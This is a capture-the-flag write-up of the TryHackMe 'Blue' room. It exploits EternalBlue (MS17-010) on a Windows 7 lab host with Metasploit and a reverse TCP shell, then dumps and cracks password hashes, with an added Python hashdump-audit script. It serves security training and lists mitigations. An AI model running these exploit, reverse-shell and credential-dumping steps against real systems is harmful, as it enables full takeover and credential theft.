A comprehensive guide to exploiting the EternalBlue vulnerability (MS17-010) on a Windows machine and performing post-exploitation activities.

Blue - TryHackMe Writeup

Blue is a beginner-friendly room focused on exploiting the EternalBlue vulnerability (MS17-010) on Windows systems. This room teaches SMB exploitation, post-exploitation techniques, and password cracking.

Difficulty: Easy ⭐
Operating System: Windows 7/Server 2008
Themes: SMB Exploitation, EternalBlue, Post-Exploitation, Hash Cracking


Objectives

  1. Identify the EternalBlue vulnerability (MS17-010)
  2. Exploit the vulnerability using Metasploit
  3. Perform post-exploitation activities
  4. Capture all flags

Reconnaissance

Initial Port Scan

Started with a fast port scan to identify open services:

nmap --min-rate 10000 -p- 10.10.54.33

Results:

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Analysis: The standard Windows ports are open, including SMB (445), which is the primary target; RDP (3389) is also exposed.

Vulnerability Scanning

Ran a targeted vulnerability scan on SMB ports:

nmap -p 445,135,139 --script vuln 10.10.54.33

Critical Finding:

| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Confirmed Vulnerability: MS17-010 (EternalBlue)


Initial Exploitation

Metasploit Setup

  1. Search for EternalBlue exploit:

    msf6 > search ms17-010

  2. Select and configure the exploit:

    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    msf6 > set RHOSTS 10.10.155.206
    msf6 > set payload windows/x64/shell/reverse_tcp
    msf6 > set LHOST 10.10.9.49
    msf6 > set LPORT 4444

  3. Execute the exploit:

    msf6 > run

Successful Exploitation:

[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (10.10.9.49:4444 -> 10.10.155.206:49251)

Shell Access Obtained:

C:\Windows\system32>whoami
nt authority\system

The shell already runs as SYSTEM: EternalBlue executes its payload inside the kernel-mode SMBv1 driver, so the resulting shell inherits SYSTEM privileges rather than those of a logged-on user.


Post-Exploitation

Shell to Meterpreter Upgrade

Backgrounded the shell session and upgraded to Meterpreter:

# Background the shell
C:\>^Z
Background session 1? [y/N] y

# Upgrade to Meterpreter
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 > set SESSION 1
msf6 > run

Meterpreter Session Established:

[*] Meterpreter session 2 opened (10.10.9.49:4433 -> 10.10.155.206:49268)

Process Migration

Migrated to a more stable process so the session survives if the original host process is killed or crashes:

meterpreter > ps
# Identified wininit.exe (PID: 592) as a stable system process
meterpreter > migrate 592
[*] Migration completed successfully.

System Information

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1)
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Credential Harvesting

Dumping Password Hashes

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
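The hashdump output above says more than the writeup uses: the NT field for Administrator and Guest is 31d6cfe0d16ae931b73c59d7e0c089c0, the MD4 hash of an empty password, so those accounts have no password set (the built-in Administrator is disabled by default on Windows 7, so an empty hash does not by itself mean it is usable). The following Python is an added example, not part of the original writeup; it parses pwdump-style lines, classifies each account by its stored hashes, and emits the user:hash lines that john --format=NT expects. The sample input is the writeup's own three lines.

```python
# Added example (not from the original writeup): audit a hashdump/pwdump-style
# listing for accounts whose stored hashes already reveal an empty or weak password.
# Sample input below is copied from the writeup's hashdump output.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

# Well-known sentinel values: LM hash seen when the password is empty or LM storage
# is disabled, and the NT hash (MD4 over UTF-16LE) of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples from user:rid:lmhash:nthash::: lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4 or len(fields[2]) != 32 or len(fields[3]) != 32:
            raise ValueError(f"malformed hashdump line: {line!r}")
        records.append((fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()))
    return records


def audit(records):
    """Map each user to a verdict derived only from the stored hashes."""
    findings = {}
    for user, rid, lm, nt in records:
        if nt == EMPTY_NT:
            verdict = "EMPTY_PASSWORD"            # no password set at all
            if rid == 500:
                verdict += "_BUILTIN_ADMIN"       # RID 500 is the built-in Administrator
        elif lm != EMPTY_LM:
            verdict = "LM_HASH_STORED"            # legacy LM hash present: trivially crackable
        else:
            verdict = "NT_ONLY"                   # needs offline cracking (john --format=NT)
        findings[user] = verdict
    return findings


def john_input(records):
    """user:nthash lines for accounts that actually have a password to crack."""
    return [f"{u}:{nt}" for u, _, _, nt in records if nt != EMPTY_NT]


if __name__ == "__main__":
    for user, verdict in audit(parse_hashdump(HASHDUMP)).items():
        print(f"{user:15} {verdict}")
    print("\n".join(john_input(parse_hashdump(HASHDUMP))))
```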

Cracking Jon’s Password

  1. Save the hash to a file:

    echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt

  2. Crack with JohnTheRipper:

    john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked Password: alqfna22


Flag Capture

Flag 1 - Root Access Proof

meterpreter > cat C:\\flag1.txt
flag{access_the_machine}

Flag 2 - SAM Database Access

meterpreter > cat C:\\Windows\\System32\\config\\flag2.txt
flag{sam_database_elevated_access}

Flag 3 - User Documents

meterpreter > cat C:\\users\\jon\\Documents\\flag3.txt
flag{admin_documents_can_be_valuable}

Key Takeaways

Attack Path Summary:

Port Scanning → SMB Vulnerability Detection → EternalBlue Exploitation → 
System Shell → Meterpreter Upgrade → Hash Dumping → Password Cracking → Flag Collection

Vulnerabilities Exploited:

  1. MS17-010 (EternalBlue) - Critical SMBv1 vulnerability allowing remote code execution
  2. Weak Credentials - Jon's password hash was crackable with a common wordlist

Mitigation Strategies:

  1. For MS17-010:
    • Apply Microsoft security update MS17-010
    • Disable SMBv1 protocol
    • Enable SMB signing
    • Use network segmentation
  2. For Credential Security:
    • Implement strong password policies
    • Enable account lockout policies
    • Use multi-factor authentication
    • Regular password audits

Tools Used:

  • Nmap - Port scanning and vulnerability detection
  • Metasploit - Exploitation framework
  • JohnTheRipper - Password cracking
  • Meterpreter - Post-exploitation toolkit

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.